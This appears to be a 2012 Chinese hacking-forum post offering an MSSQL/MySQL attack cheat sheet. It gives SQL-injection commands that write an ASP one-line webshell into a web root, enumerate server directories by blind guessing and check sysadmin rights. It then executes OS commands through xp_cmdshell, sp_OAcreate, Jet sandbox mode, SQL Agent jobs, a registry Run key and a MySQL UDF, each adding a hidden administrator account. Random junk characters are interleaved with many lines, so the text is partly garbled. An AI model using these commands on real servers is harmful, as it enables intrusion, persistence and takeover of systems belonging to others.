找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2779|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
MSSQL语句导出一句话木马
7 }, H  z" w8 d/ q' g# e7 E首先确定网站的WEB路径0 b' \; V+ x! C- H* Q
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
3 w9 B% p: Y# }/ R# p
& M* r4 M/ n5 q! `0 b4 J' u7 \;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
! i, W% A, O8 ^4 c" ]: y//将一句话木马插入表中' @) S2 N! s9 k3 @0 }, O1 ]
8 D. M5 p6 E) r, I: t6 Z; z) L2 w
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
" V& h0 W/ A8 R. h7 B+ w8 f. M//导出一个ASP文件, o) ?) M. l/ j: s2 a" P
# V- d( {* t- y

) i; _/ m" w8 C- ?" V9 d关于MSSQL列目录2 r7 v9 C6 C9 N- N$ E
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
" [% Y) P- ?+ L5 ^Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表- x% }, B; o; p. ?5 }( P
( d. |5 I5 a9 i- v
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
) B! F+ F( D: A" h
, {$ Z4 ~% g" }$ wAnd (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段# v; W* H; O: z4 Y/ q7 e
- z- ]# x3 l  {& Q# r: j9 q
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
' z* n/ z( n$ u3 r) e; y8 l3 C1 T/ i+ i# }0 \) v- Y
- u3 T8 ?' Z& s/ h5 ~- U! D, L
数据库版本和权限查看7 }$ c# C1 f, ^7 O; X. T
and 1=(select @@VERSION) //查看详细的数据库信息.
, d( V0 N" e, r* Z- S% Hand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
* K- {7 q% z  jand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
9 N( u* o2 y$ t2 r+ v2 Z! h, W2 z% r7 M6 R& [( x  b
: t4 c% X( ?! ^2 t3 ]
1.利用xp_cmdshell执行命令* L8 f, {: d8 z3 R7 h6 G
exec master..xp_cmdshell 'net user rfire 123456 /add'
3 E0 {; K2 {0 Jexec master..xp_cmdshell 'net localgroup administrators rfire /add') f9 m  H% u' F/ A$ d

- {# _% R/ }! S4 F% b9 u; Q( k恢复xp_cmdshell存储过程( H3 f1 ]$ h! h% O$ o( e8 h. v+ N: [
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'6 W/ X% }- x2 k6 n- X

9 k, C7 o1 |* C* c/ x2 k* N; J& P; J) d1 J. @4 H4 ^1 [& l
2.利用SP_OAcreate和SP_OAMETHOD执行命令+ b2 }5 }  L" Y6 d3 {9 p6 H+ x
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
- O$ d: s6 C/ XDECLARE @shell INT //建立一个@shell实体
% e" X& \$ O% Y% E/ Q. n2 c; K+ ?EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
$ @5 j- u: S+ I* N5 w2 {( WEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例2 v: }  E1 V) p& `/ I

+ v( ~! b2 I! V6 I; L+ H5 {" W2 I: U8 L4 T& {4 f0 C
3.利用沙盒模式0 L) O" S3 r% q% m4 L& Y
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。& R0 c& p# v  t" |+ z
开启沙盒模式:( o# Q5 F& @5 b8 I* i+ H
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
% O7 P, Z4 i- ~9 N: p, J. e# c$ |8 x3 t5 [, S- H! Q
执行命令:
! @/ _" r/ S: |4 @. l1 R- J2 x# l) hSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
7 k; I0 t: C/ Y& U! f% @% H) J  p4 f* L7 P  {8 M  D3 o  s1 I
8 d* E0 K/ C' z* _+ ~( u
4.利用SQL代理执行命令
5 `. {( D( a- G# jEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
+ N% j' Y& g4 C
: b: |# H; c( ?3 B+ N# t% \执行命令:% |" O( h" ~$ S# _4 ]- m+ I- Z
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错
: k( f) C4 v9 J  ]: R7 yexec sp_add_job 'x'- b# q3 M. C% x/ N' Z; e4 w4 P# C
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
& F. X; p, l9 C( v- V- A/ Sexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
$ [7 }5 w2 g, {, Q6 f. n! z0 M' D' C: N
, n' r7 J& C2 B% V) \" |7 N
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)9 H, y1 ~+ Z, h: t( @' {
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'* h, R1 @" q( S

! `" ~3 x# N  c# w
0 m, s/ |8 A/ e% D8 q6.MYSQL的命令执行2 I5 I! B2 F% \. x* w8 q8 q
MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)+ I: d& x% G$ v& w- T! a
首先要在su.php下导出c:\windows\udf.dll
0 `# ]! H- R  r. E3 H6 o导出后执行创建自定义函数命令:
3 e. s& @# |) O/ ^) {1 nCreate Function cmdshell returns string soname 'udf.dll'
% I8 v* ?1 w8 ^9 T# V$ Z执行命令
! ^+ g  i- E( j- T9 e; Q9 ?0 ^5 d& Mselect cmdshell('net user rfire 123456 /add')2 L, T, T' `* C% f$ @8 B' Y# ?
执行后删除函数 drop function cmdshell; Y; E2 X5 l( p2 [7 J. b! ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表